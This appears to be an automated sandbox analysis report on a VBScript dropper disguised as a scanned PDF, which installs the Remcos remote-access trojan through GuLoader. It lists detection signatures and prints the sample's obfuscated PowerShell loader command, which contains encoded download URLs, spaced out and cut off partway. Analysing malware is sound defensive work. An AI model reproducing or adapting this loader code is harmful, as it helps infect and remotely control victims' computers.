Edit tour
Windows
Analysis Report
Scanned_22C-6e24090516030.pdf.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7784 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Scann ed_22C-6e2 4090516030 .pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 7912 cmdline:
ping gorme zl_6777.67 77.6777.67 7e MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 7920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7972 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Semipo or Radicul ose Hornug len Lamina terne Cade sse Freesp ac #>;$Hen kastet='Sp leneticall y35';<#Kas koforsikre Bollix Rd slens #>;$ Stepway=$S ammentrdni nger+$host .UI; funct ion Tugger y($cracks) {If ($Step way) {$Rup turable++; }$Seerlike =$Ordrebeh oldningern es+$cracks .'Length'- $Rupturabl e; for( $P ickaxes=4; $Pickaxes -lt $Seerl ike;$Picka xes+=5){$U ndertrkken e=$Pickaxe s;$Fascina tionen+=$c racks[$Pic kaxes];$Br onchoesoph agoscopy=' Noomis';}$ Fascinatio nen;}funct ion Phonog ramically( $Karakterm ord){ . ($fritflu e) ($Karak termord);} $Finalisme ns=Tuggery 'SurmMPo aoUnsezAll ei,syklTra .l Proa Re p/Spar ';$ Finalismen s+=Tuggery 'N ct5S n g. Kar0Deu t Ne (Deli WYdmyipapo nbombdBore oRegnwstan sK tt Acou NValvTTabl Lept1Rere 0Fami.M al 0 ps;Unsc Ha,nWaeroi LyrinRefl6 Star4sca ; Clip chylx Futu6Li h4 tax ; Blr DefarCryov Q,i:Tinc1 Re.i3 Kod1 Stop.Term0 .eo)Sp.j FabuGTrane S.ltcDentk rinoB ne/ Unde2Si n0 Konk1Kabi0 Hu.d0Umbr1 Agn0Note1 Guri SndFa utoiSa,drA nteeCob fL uckoPa,ax van/ gtp1P er.3Sini1S alm.Sta 0L .ks ';$bro kbinds=Tug gery 'staf u.ankSMong E HabR unm -ste aH lk g T,oeBedr NF.lutBedr ';$Hemato zoan=Tugge ry 'noeshB agetKoortR efepUransD isk:clei/K rak/ Sliw RenwA,etwT ekn. AntgT nksr Sluo DecuSublpV i.erOveri, apoaProgm Hou.WithcC laso jemRa ,e/SminMF. vraEr,vnNi ddd DrisBi pecMandhBy zaaPre uAr nuvVicaiEr .vnIn qiFr aasRavemSy sseDefl. D issHemanLo vlp rug> R enhBuk tCh eftRej.pSa nds emi:Ve rr/Sple/Oe jnbOrrorKa ktuSub t S a aUdsd.Ah orp.lurl S y /Sor MHk keaAfg n e trdMi lsDi vucheelhDi sca Tu uSh awvAfstino n nSpkkiFo rvsFo mm.l ageSkru.Ca bs RevnBe sppAnel '; $dacha=Tug gery ' Shi >Blue ';$f ritflue=Tu ggery 'Res ai PineRag sX ugg ';$ Dessinatre n='solstra alehistori ers';$Sygn e='\Sttefi skenes.Tav ';Phonogra mically (T uggery 'Pr od$ BolGSy dkL.umaOTr atbbetaa S polBis.: e lldTezcIPr siSA.beKSt anS Absp P roe HanCCy stiHa,tF n gmiTunnKNo npA alot l aiIAmbiola boNLeukebo flrKontS S yn2 Kla4Ex ci8Ceph=ch it$Ungde L sN ftev N on:ewerAR vapSupepAd u.DSataAB ugtbefaatu ft+G.da$Cp lbSAutoYFr itG waiNAd frEBg r ') ;Phonogram ically (Tu ggery 'br d$UratGRel alHerbo U, hb YikaTo, mL H.k:Can aBOpsirSki bUSlukgMon oeEsquRFir es ixeSaff RCa sV Con IApatc Bud ERist=Komm $be yhMurd EBeweMEurh aPigrtUnci obadezSmal OForuADoor NMeal. De, s En PExod l.eenIHemi THyal( agt $GangDPani aschlC Sat HSjusafunk )t,im ');P honogramic ally (Tugg ery 'thro[ FlerNHeptE CasttCaes. Pe SK mmE CardRStamV TilbiHaanC Lns eAdipP Dr.goDrami ChronKbslt .limVar.A acknBe oa AdelgHed.e SatcR nde] Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejry sup p Trar Uimoo Salt